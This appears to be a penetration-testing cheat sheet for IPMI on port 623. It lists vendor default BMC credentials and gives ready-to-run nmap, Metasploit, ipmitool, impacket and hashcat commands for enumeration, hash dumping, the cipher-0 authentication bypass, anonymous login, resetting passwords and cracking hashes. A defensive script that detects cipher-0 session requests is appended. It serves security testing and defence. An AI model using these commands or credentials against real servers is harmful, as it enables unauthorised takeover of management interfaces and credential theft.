# IPMI | 623

<table><thead><tr><th width="194">Vendor</th><th width="157">Username</th><th width="195">Password</th><th>Notes</th></tr></thead><tbody><tr><td><strong>Supermicro</strong></td><td><code>ADMIN</code></td><td><code>ADMIN</code></td><td>Some newer models use unique passwords.</td></tr><tr><td><strong>IBM / Lenovo</strong></td><td><code>USERID</code></td><td><code>PASSW0RD</code></td><td>Common for Flex System x hardware.</td></tr><tr><td><strong>pfSense Netgate</strong></td><td><code>ADMIN</code></td><td>Varies</td><td>Reset using <code>ipmitool</code>. Default ID is <code>2</code>.</td></tr><tr><td><strong>Quantum VS4160-HCI</strong></td><td><code>ADMIN</code></td><td>On system label</td><td>Change via VS-Settings Menu.</td></tr><tr><td><strong>Quantum VS1110-A</strong></td><td><code>ADMIN</code></td><td><code>BMCadmin1</code></td><td>Change via Advanced Menu.</td></tr><tr><td><strong>Blackcore</strong></td><td><code>admin</code></td><td><code>admin123</code></td><td>For SPR-M, SPR-X, RPL, 3100 series.</td></tr><tr><td><strong>Nutanix</strong></td><td><code>ADMIN</code></td><td>Node serial number</td><td>Use node's serial in caps.</td></tr><tr><td><strong>Datto</strong></td><td>Provided by Datto</td><td>First 16 chars of backup-admin</td><td>Changes periodically.</td></tr><tr><td><strong>Dell</strong></td><td><code>root</code></td><td><code>calvin</code></td><td>Default for iDRAC systems.</td></tr><tr><td><strong>Cisco</strong></td><td><code>admin</code></td><td><code>password</code></td><td>Common for UCS servers.</td></tr><tr><td><strong>HP / HPE</strong></td><td><code>Administrator</code></td><td>Unique on system label</td><td>Often randomized for iLO.</td></tr></tbody></table>

* Enumerations

```bash
## ------------------| Version Detection (nmap)
sudo nmap -sU --script ipmi-version -p 623 $IP

## ------------------| Version Detection (Metasploit, run inside msfconsole)
use auxiliary/scanner/ipmi/ipmi_version
```

* Dumping Hashes

```bash
## ------------------| Using Metasploit
use auxiliary/scanner/ipmi/ipmi_dumphashes

## ------------------| Using ipmitool
ipmitool -I lanplus -H $IP -U <USERNAME> -P <PASSWORD> user list 1

## ------------------| Using impacket
ipmi_hash_dump.py $IP -u <USERNAME> -p <PASSWORD>
rakp.py $IP
```

* Vulnerabilities

```bash
## ------------------| Change password for root user
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user set password 2 newpassword

## ------------------| IPMI Authentication Bypass via Cipher 0
use auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user list   # -C 0 selects cipher suite 0; dumps the list of users

## ------------------| IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval
use auxiliary/scanner/ipmi/ipmi_dumphashes
set OUTPUT_HASHCAT_FILE cat-hash
set OUTPUT_JOHN_FILE john-hash
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user list

## ------------------| IPMI Anonymous Authentication
ipmitool -I lanplus -H 10.10.11.124 -U '' -P '' user list

## ------------------| Supermicro IPMI UPnP
use exploit/multi/upnp/libupnp_ssdp_overflow

## ------------------| Crack HP iLO default password
hashcat -m 7300 hashes.txt -a 3 -1 '?d?u' '?1?1?1?1?1?1?1?1'   # quote the masks so the shell does not glob-expand '?'
```
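A detection-side companion to the Cipher 0 entry above, added here as an example and not part of the original page: it parses a UDP/623 datagram as an RMCP+ Open Session Request and flags a proposal of cipher suite 0 (RAKP-none, no integrity, no confidentiality). Function names and the sample datagrams are constructed for illustration; field offsets follow the IPMI 2.0 Open Session Request layout.

```python
import struct

RMCP_IPMI = bytes([0x06, 0x00, 0xFF, 0x07])   # RMCP v1.0, reserved, no-ACK seq, class = IPMI
AUTHTYPE_RMCPP = 0x06                          # IPMI v2.0 / RMCP+ session header format
PAYLOAD_OPEN_SESSION_REQ = 0x10                # RMCP+ Open Session Request
NAMES = {0: "auth", 1: "integrity", 2: "confidentiality"}


def parse_open_session_request(udp_payload: bytes):
    """Return the algorithms proposed in an RMCP+ Open Session Request, else None."""
    if len(udp_payload) < 48 or udp_payload[:4] != RMCP_IPMI:
        return None
    if udp_payload[4] != AUTHTYPE_RMCPP or udp_payload[5] & 0x3F != PAYLOAD_OPEN_SESSION_REQ:
        return None
    (length,) = struct.unpack_from("<H", udp_payload, 14)   # after session ID + sequence
    body = udp_payload[16:16 + length]
    if len(body) < 32:
        return None
    proposal = {"max_priv": body[1] & 0x0F}
    # Three 8-byte records follow the 8-byte request header:
    # type (0/1/2), 2 reserved bytes, record length, algorithm number, 3 reserved bytes.
    for off in (8, 16, 24):
        rec_type, algo = body[off], body[off + 4] & 0x3F
        if rec_type not in NAMES:
            return None
        proposal[NAMES[rec_type]] = algo
    return proposal if len(proposal) == 4 else None


def proposes_cipher_zero(udp_payload: bytes) -> bool:
    """True when the client explicitly asks for algorithms (0, 0, 0), i.e. cipher suite 0."""
    p = parse_open_session_request(udp_payload)
    return p is not None and (p["auth"], p["integrity"], p["confidentiality"]) == (0, 0, 0)


def sample_request(auth: int, integ: int, conf: int) -> bytes:
    """Constructed test datagram (not a capture) carrying the given algorithm numbers."""
    recs = b"".join(bytes([t, 0, 0, 8, a, 0, 0, 0]) for t, a in ((0, auth), (1, integ), (2, conf)))
    body = bytes([0x00, 0x04, 0, 0]) + struct.pack("<I", 0xA0A2A3A4) + recs
    header = bytes([AUTHTYPE_RMCPP, PAYLOAD_OPEN_SESSION_REQ]) + bytes(8)  # session ID, seq = 0
    return RMCP_IPMI + header + struct.pack("<H", len(body)) + body


if __name__ == "__main__":
    for name, pkt in (("suite 0", sample_request(0, 0, 0)), ("suite 3", sample_request(1, 1, 1))):
        print(name, parse_open_session_request(pkt), "ALERT" if proposes_cipher_zero(pkt) else "ok")
```

Feed it the UDP payloads of port-623 traffic from a sensor or pcap reader; an alert on a management VLAN means a client tried to open an unauthenticated session, and the BMC should have cipher suite 0 disabled regardless.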

